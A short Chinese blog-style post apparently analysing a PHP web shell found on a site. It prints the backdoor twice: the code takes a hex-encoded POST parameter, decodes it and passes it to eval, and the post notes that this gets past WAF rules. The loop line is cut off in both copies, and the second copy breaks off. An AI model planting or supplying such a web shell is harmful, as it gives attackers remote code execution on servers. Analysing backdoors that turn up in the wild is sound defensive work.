一个有趣的一句话木马，加密了通讯方式，使用了一个小特性。

朋友发现一个后门文件，让我看看如何使用。

使用了hex编码进行加密，这样完全可以过各种防护。如果防护加了规则，那就加点算法扰乱，感觉通过正则WAF时代要过去了。。。没什么卵用，太难防御了。

gutou=706870696E666F28293B   phpinfo()

error_reporting(0);set_time_limit(0);

$GuTou=@$_POST["gutou"];

if($GuTou){

   $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

   $cc="";for($i=0;$i

   $cc.=urldecode("%".substr($GuTou,$i,2));

   @eval($cc);exit;

}

?>

另外一个网站发现这样的代码：

$GuTou=@$_POST["gutou"];

if($GuTou){

   $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

   $cc="";for($i=0;$i

   $cc.=urldecode("%".substr($GuTou,$i,2));

   @eval($cc);exit;